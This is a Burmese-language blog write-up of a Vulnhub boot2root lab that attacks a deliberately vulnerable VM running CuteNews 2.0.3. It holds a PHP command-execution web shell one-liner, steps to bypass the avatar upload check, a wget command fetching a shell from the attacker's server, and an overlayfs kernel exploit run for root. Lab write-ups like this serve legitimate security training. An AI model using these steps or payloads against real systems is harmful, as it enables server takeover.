Vulnhub, Web Security

Simple Boot2Root [writeup]

Boot2Root VM ကို ဒီမှာ download ဆွဲလို့ရပါတယ်။

 

လုပ်ရမှာကတော့ Web Application ကနေ Root Access ရတဲ့ထိလုပ်ရမှာဖြစ်ပါတယ်။

ပထမဆုံးတော့ VM ရဲ့ IP ကိုသိရဖို့အတွက် netdiscover နဲ့ scan ဖတ်လိုက်ပါတယ်။

netdiscover -i wlan0 -r 192.168.0.0/24

IP သိရပြီဆိုရင်တော့ ဘာ OS လဲ ဘယ် port တွေပွင့်နေလဲဆိုတာသိရဖိုကအတွက် nmap နဲ့ scan လိုက်ပါမယ်။

nmap -sS -sV -O <ip>

port 80 ပွင့်နေတာကိုတွေ့ရပါတယ်။ port 80 က http ရဲ့ port ဖြစ်ပါတယ်။ ပြီးတော့ ဒီ VM ကလဲ Web Based ဆိုတော့

http://<ip> လို့ခေါ်ကြည့်တဲ့အချိန်မှာ CuteNews v.2.0.3 ကိုသုံးထားတာတွေ့ရပါတယ်။ CuteNews v.2.0.3 မှာ File Upload Vulnerability ရှိပါတယ်။ https://www.exploit-db.com/exploits/37474/

Exploit Information

# Exploit  :
 
Vuln : http://127.0.0.1/cutenews/index.php?mod=main&opt=personal
  
 1 - Sign up for New User
 2 - Log In
 3 - Go to Personal options http://www.target.com/cutenews/index.php?mod=main&opt=personal
 4 - Select Upload Avatar Example: Evil.jpg
 5 - use tamper data  & Rename File Evil.jpg to Evil.php
<?php system($_GET[‘cmd’]; ?> ဆိုတဲ့ PHP RCE code ကို luna.jpg နဲ့ save လိုက်ပါတယ်။
Temper Data ကိုသုံးပြီးတော့ Upload Validation ကို bypass လုပ်လိုက်ရင်ရပါပြီ။ ဒီတော့ jpg ဆိုတာကို php extension ပြန်ပြောင်းမယ် Content-Type ကတော့ Image ဆိုတော့ Validation ကို pass ဖြစ်သွားပါလိမ့်မယ်။
ဒီလိုဆိုကျနော်တို့ RCE file လေးကိုပြန်ခေါ်ကြည့်မယ်။ အလုပ်လုပ်လားမလုပ်လားပေါ့။
ခုဆိုရင် ပထမတစ်ပိုင်းတော့ပြီးပြီ Web Shell တင်လို့ရပြီ။ ဒါပေမယ့် root access ရတဲ့အထိဆိုတော့ Web Shell တစ်ခုခုတင်လိုက်တာပိုအဆင်ပြေတာပေါ့။ ဒါကြောင့် madspot shell လေးတင်လိုက်ပါတယ်။
uploader တွေဘာတွေမတင်ချင်တော့လို့ ကျနော်တို့ server ဘက်မှာ Shell ကို txt file နဲ့တင်ပြီးတော့ wget နဲ့ download ဆွဲချလိုက်တယ်။
wget <our_server_ip>/abcd.txt -O abcd.php
တင်ပြီးပြီဆိုတော့ madspot shell ရပြီပေါ့။
Root လုပ်ဖို့အတွက် Kernel Exploit ရှိမရှိရှာရမှာဖြစ်ပါတယ်။
Google မှာရှာလိုက်တဲ့အခါမှာ တော့ ဒီလို ပြပါတယ်။
Overlayfs နဲ့ ဒီ kernel တွေမှာ root exploit ရှိတာကိုတွေ့ရမှာပါ။
ဒီတော့ VM နဲ့ ကျနော်တို့ စက်ကို connect လုပ်ရမယ်။
connect ရပြီဆိုရင်တော့ exploit ကို /var/www/html/uploads/ မှာ upload တင် C file ကို Compile လုပ်ပြီး run လိုက်ရင် root access ရသွားမှာဖြစ်ပါတယ်။
Hack the planet! တဲ့ ရသွားပါပြီ။
Thanks for Reading xD
Previous Post Next Post

You Might Also Like

No Comments

Leave a Reply